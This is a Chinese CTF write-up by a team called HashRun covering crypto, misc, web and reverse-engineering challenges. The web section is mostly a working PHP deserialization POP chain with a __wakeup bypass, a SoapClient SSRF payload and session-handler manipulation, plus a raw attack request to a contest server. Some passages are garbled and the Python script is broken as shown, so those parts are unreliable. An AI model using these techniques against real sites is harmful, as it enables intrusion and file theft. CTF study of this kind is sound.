前言
HashRun安全团队最终排名56。
Crypto@S1gMa
知识点
sha256掩码爆破
解题过程
step1:先 nc链接获取密文,然后根据“xxxx + 明文”,进行掩码爆破将爆破出的字符串和密文的前 8比对得到结果
step2:头铁猜数字,直接猜就行只有 6次机会,失败了得重新 nc然后重复 step1的操作。(然后我就脸黑猜了5遍多…)
贴上脚本:
import hashlib
dic=['Q','W','E','R','T','Y','U','I','O','A','S','D','F','G','H','J','K','P','L','Z','X','C','V','B','N','M','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']
for a in range(len(dic)):
for b in range(len(dic)):
for c in range(len(dic)):
for d in range(len(dic)):
m = dic[a] + dic[b] + dic[c] + dic[d] + ''
flag=hashlib.sha256(m.encode('utf-8')).hexdigest()
if flag[0:8]=='':
print (flag)
print(dic[a],dic[b],dic[c],dic[d])
D0g3{Y0u_C4n_gu3ss_The_Fl4g}
Misc1@q1uf3ng
解题过程
打开游戏,ce速度改500,在疯狂鬼畜的上升中隐约看到一个非常臭的数字。
D0g3{1145141919810}
Web1@T4x0r
解题过程
https://www.cnblogs.com/NPFS/p/14335370.html
网站源码:index.php
<?php
class A
{
public $a;
public $b;
public function __wakeup()
{
$this->a = "babyhacker";
}
public function __invoke()
{
if (isset($this->a) && $this->a == md5($this->a)) {
$this->b->uwant();
}
}
}
class B
{
public $a;
public $b;
public $k;
function __destruct()
{
$this->b = $this->k;
die($this->a);
}
}
class C
{
public $a;
public $c;
public function __toString()
{
$cc = $this->c;
return $cc();
}
public function uwant()
{
if ($this->a == "phpinfo") {
phpinfo();
} else {
call_user_func(array(reset($_SESSION), $this->a));
}
}
}
if (isset($_GET['d0g3'])) {
ini_set($_GET['baby'], $_GET['d0g3']);
session_start();
$_SESSION['sess'] = $_POST['sess'];
}
else{
session_start();
if (isset($_POST["pop"])) {
unserialize($_POST["pop"]);
}
}
var_dump($_SESSION);
highlight_file(__FILE__);
flag.php:
<?php
session_start();
highlight_file(__FILE__);
//flag在根目录下
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
$f1ag=implode(array(new $_GET['a']($_GET['b'])));
$_SESSION["F1AG"]= $f1ag;
}else{
echo "only localhost!!";
}
发现flag.php文件new了一下,需要一个类,第一个思路,php原生类,在看提示,flag在根目录我们也是通过这个入口点进行读取,找到一个php原生类,进行读取DirectoryIterator
然后flag⽂件为:f1111llllllaagg
1.可以利⽤ SoapClient 类的 __call (当调⽤对象中不存在的⽅法会⾃动调⽤此⽅法)⽅法来进⾏
SSRF
2.call_user_func函数中的参数可以是⼀个数组,数组中第⼀个元素为类名,第⼆个元素为类⽅法。
3.先传⼊extract(),将
b
覆
盖
成
回
调
函
数
,
这
样
题
⽬
中
的
4.
c
a
l
l
u
s
e
r
f
u
n
c
(
b覆盖成回调函数,这样题⽬中的 4.call_user_func(
b覆盖成回调函数,这样题⽬中的4.calluserfunc(b,$a) 就可以变成
5.call_user_func(‘call_user_func’,array(‘SoapClient’,’welcome_to_the_lctf2018’)) ,
6.即调⽤ SoapClient 类不存在的 welcome_to_the_lctf2018 ⽅法,从⽽触发 __call ⽅法发起 soap
7.请求进⾏ SSRF
8.然后session反序列化
构造exp:
<?php
$url = "http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg";
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
$a = str_replace('^^', "\r\n", $a);
echo "|" . urlencode($a);
?>
pop:O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A60%3A%22http%3A%2F%2F
然后传⼊,数据包:
POST /?d0g3=php_serialize&baby=session.serialize_handler HTTP/1.1
Host: 47.108.29.107:10104
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/w
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lorqmn6i2nl32ab290gnooakc
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 320
sess=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A60%3A%22http%3A
然后访问index.php⼀次,在看index.php反序列化构造:
wakeup好绕过加个属性数量就ok,接下来的思路:
C类中的$cc会触发A类的 __invoke() 魔术⽅法,A类的a属性会触发C类的 __toString ⽅法然后
A类⽅法中会调⽤uwant⽅法,uwant⽅法在C类所以A类⽅法中的b属性为C的对象,md5哪些就不说
了
即exp(未最终):
<?php
2
3 class A{
4 public $a;
5 public $b;
6 }
7
8 class B{
9 public $a;
10 public $b;
11 public $k;
12 }
13
14 class C{
15 public $a;
16 public $c;
17 }
18
19 $d = new A();
20 $e = new B();
21 $f = new C();
22 $g = new C();
23
24 $e -> a = $f;
25 //$d -> a = $f;
26 $f -> c = $d;
27 $d -> b = $g;
28 $d -> a = "0e215962017";
29 $g -> a = "phpinfo";
30 echo serialize($e);
最终
<?php
2
3 class A{
4 public $a;
5 public $b;
6 }
7
8 class B{
9 public $a;
10 public $b;
11 public $k;
12 }
13
14 class C{
15 public $a;
16 public $c;
17 }
18
19 $d = new A();
20 $e = new B();
21 $f = new C();
22 $g = new C();
23
24 $e -> a = $f;
25 //$d -> a = $f;
26 $f -> c = $d;
27 $d -> b = $g;
28 $d -> a = "0e215962017";
29 $g -> a = "www"; //随便写,只要不等于phpinfo
30 echo serialize($e);
这⾥phpinfo可以验证是否对,跑出来给属性加加个数字即可绕过wakeup,
上exp的pop链+wakeup绕过:
O:1:"B":4:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";s:11:"0e21596
如果不等于phpinfo即可进⼊到 call_user_func
pop:
O:1:"B":4:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";s:11:"0e21596
先对其经⾏session反序列化搞定reset
访问index.php即可看到成功
再打pop
500说明执⾏了,在访问index.php
可以看到完整的触发结果,并且服务器给我们⼀个phpsession,我们把原先的session改了,再次访问
index.php即可查看到flag
D0g3{d18dfdd0c0064af3ac355b919b77df49}
reeee@n00bzx
ida打开,函数很少,看到有个创建⼦进程,然后暂停修改⼦进程eip.
点⼊对应函数,发现判断输⼊字节数,加密函数有⼀条简单的花指令.
去掉后发现是未变异的rc4.
数据和key抠出来上⽹在线解密就⾏了.
4380
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
